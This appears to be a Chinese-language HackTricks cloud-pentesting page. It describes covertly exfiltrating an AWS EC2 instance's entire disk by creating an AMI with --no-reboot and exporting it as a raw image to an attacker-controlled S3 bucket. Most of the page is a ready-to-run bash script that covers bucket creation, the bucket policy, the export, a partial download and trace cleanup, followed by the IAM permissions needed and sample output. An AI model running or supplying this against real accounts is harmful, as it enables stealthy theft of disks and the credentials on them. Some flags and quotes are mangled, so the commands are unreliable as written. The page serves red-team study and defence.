AWS – 隐蔽磁盘 Exfiltration via AMI Store-to-S3 (CreateStoreImageTask)

Tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

查看 订阅计划!

加入 💬 Discord 群组 或 Telegram 群组 或在 Twitter 🐦 上关注我们 @hacktricks_live.

通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

摘要

滥用 EC2 AMI 的 export-to-S3 功能，将 EC2 实例的完整磁盘作为单个原始映像存储到 S3 中进行 Exfiltration，然后带外下载。这样可以避免共享快照，并为每个 AMI 生成一个对象。

要求

EC2: ec2:CreateImage, ec2:CreateStoreImageTask, ec2:DescribeStoreImageTasks 在目标实例/AMI 上的权限
S3（相同 Region）: s3:PutObject, s3:GetObject, s3:ListBucket, s3:AbortMultipartUpload, s3:PutObjectTagging, s3:GetBucketLocation
对保护 AMI 快照的密钥具有 KMS 解密权限（如果启用了 EBS 默认加密）
S3 桶策略信任 vmie.amazonaws.com 服务主体（见下文）

影响

在不共享快照或跨账户复制的情况下，在 S3 中离线获取实例根磁盘的完整副本。
允许从导出的原始映像对凭证、配置和文件系统内容进行隐蔽取证分析。

如何通过 AMI Store-to-S3 进行 Exfiltration

注意：
S3 桶必须与 AMI 位于相同 Region。
在 us-east-1 中，create-bucket 不得包含 --create-bucket-configuration。
--no-reboot 会在不停止实例的情况下创建崩溃一致性的映像（更隐蔽但一致性较差）。

逐步命令

```bash # Vars REGION=us-east-1 INSTANCE_ID= BUCKET=exfil-ami-$(date +%s)-$RANDOM

1) Create S3 bucket (same Region)

if [ “$REGION” = “us-east-1” ]; then aws s3api create-bucket –bucket “$BUCKET” –region “$REGION” else aws s3api create-bucket –bucket “$BUCKET” –create-bucket-configuration LocationConstraint=$REGION –region “$REGION” fi

2) (Recommended) Bucket policy to allow VMIE service to write the object

ACCOUNT_ID=$(aws sts get-caller-identity –query Account –output text) cat > /tmp/bucket-policy.json <<POL { “Version”: “2012-10-17”, “Statement”: [ { “Sid”: “AllowVMIEPut”, “Effect”: “Allow”, “Principal”: {“Service”: “vmie.amazonaws.com”}, “Action”: [ “s3:PutObject”, “s3:AbortMultipartUpload”, “s3:ListBucket”, “s3:GetBucketLocation”, “s3:GetObject”, “s3:PutObjectTagging” ], “Resource”: [ “arn:aws:s3:::$BUCKET”, “arn:aws:s3:::$BUCKET/” ], “Condition”: { “StringEquals”: {“aws:SourceAccount”: “$ACCOUNT_ID”}, “ArnLike”: {“aws:SourceArn”: “arn:aws:ec2:$REGION:$ACCOUNT_ID:image/ami-”} } } ] } POL aws s3api put-bucket-policy –bucket “$BUCKET” –policy file:///tmp/bucket-policy.json

3) Create an AMI of the victim (stealthy: do not reboot)

AMI_ID=$(aws ec2 create-image –instance-id “$INSTANCE_ID” –name exfil-$(date +%s) –no-reboot –region “$REGION” –query ImageId –output text)

4) Wait until the AMI is available

aws ec2 wait image-available –image-ids “$AMI_ID” –region “$REGION”

5) Store the AMI to S3 as a single object (raw disk image)

OBJKEY=$(aws ec2 create-store-image-task –image-id “$AMI_ID” –bucket “$BUCKET” –region “$REGION” –query ObjectKey –output text)

echo “Object in S3: s3://$BUCKET/$OBJKEY”

6) Poll the task until it completes

until [ “$(aws ec2 describe-store-image-tasks –image-ids “$AMI_ID” –region “$REGION”
–query StoreImageTaskResults[0].StoreTaskState –output text)“ = “Completed” ]; do aws ec2 describe-store-image-tasks –image-ids “$AMI_ID” –region “$REGION”
–query StoreImageTaskResults[0].StoreTaskState –output text sleep 10 done

7) Prove access to the exported image (download first 1MiB)

aws s3api head-object –bucket “$BUCKET” –key “$OBJKEY” –region “$REGION” aws s3api get-object –bucket “$BUCKET” –key “$OBJKEY” –range bytes=0-1048575 /tmp/ami.bin –region “$REGION” ls -l /tmp/ami.bin

8) Cleanup (deregister AMI, delete snapshots, object & bucket)

aws ec2 deregister-image –image-id “$AMI_ID” –region “$REGION” for S in $(aws ec2 describe-images –image-ids “$AMI_ID” –region “$REGION”
–query Images[0].BlockDeviceMappings[].Ebs.SnapshotId –output text); do aws ec2 delete-snapshot –snapshot-id “$S” –region “$REGION” done aws s3 rm “s3://$BUCKET/$OBJKEY” –region “$REGION” aws s3 rb “s3://$BUCKET” –force –region “$REGION”

</details>

## 证据示例

- `describe-store-image-tasks` 状态转换：
```text
InProgress
Completed

S3 对象元数据（示例）：

{
"AcceptRanges": "bytes",
"LastModified": "2025-10-08T01:31:46+00:00",
"ContentLength": 399768709,
"ETag": "\"c84d216455b3625866a58edf294168fd-24\"",
"ContentType": "application/octet-stream",
"ServerSideEncryption": "AES256",
"Metadata": {
"ami-name": "exfil-1759887010",
"ami-owner-account": "<account-id>",
"ami-store-date": "2025-10-08T01:31:45Z"
}
}

部分下载证明对象访问：

ls -l /tmp/ami.bin
# -rw-r--r--  1 user  wheel  1048576 Oct  8 03:32 /tmp/ami.bin

必需的 IAM 权限

EC2: CreateImage, CreateStoreImageTask, DescribeStoreImageTasks
S3 (在导出 bucket 上): PutObject, GetObject, ListBucket, AbortMultipartUpload, PutObjectTagging, GetBucketLocation
KMS: 如果 AMI 快照已加密，允许对用于快照的 EBS KMS 密钥进行解密

Tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

查看 订阅计划!

加入 💬 Discord 群组 或 Telegram 群组 或在 Twitter 🐦 上关注我们 @hacktricks_live.

通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。